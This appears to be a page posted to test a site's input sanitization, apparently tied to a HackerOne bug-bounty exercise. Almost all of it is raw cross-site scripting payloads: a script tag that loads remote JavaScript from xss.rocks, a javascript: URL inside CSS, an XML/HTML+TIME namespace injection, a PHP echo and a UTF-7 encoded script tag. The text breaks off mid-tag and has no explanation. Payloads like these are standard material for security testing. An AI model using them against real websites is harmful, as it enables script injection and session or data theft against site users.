(HackerOne) Input Sanitization Testing

<SCRIPT/SRC=“http://xss.rocks/xss.js”></SCRIPT

<

test

li {list-style-image: url("javascript:alert('XSS')");}
  • XSS


<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")">
<? echo('alert("XSS")'); ?>
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

XSS

<a href="/share?content_type=1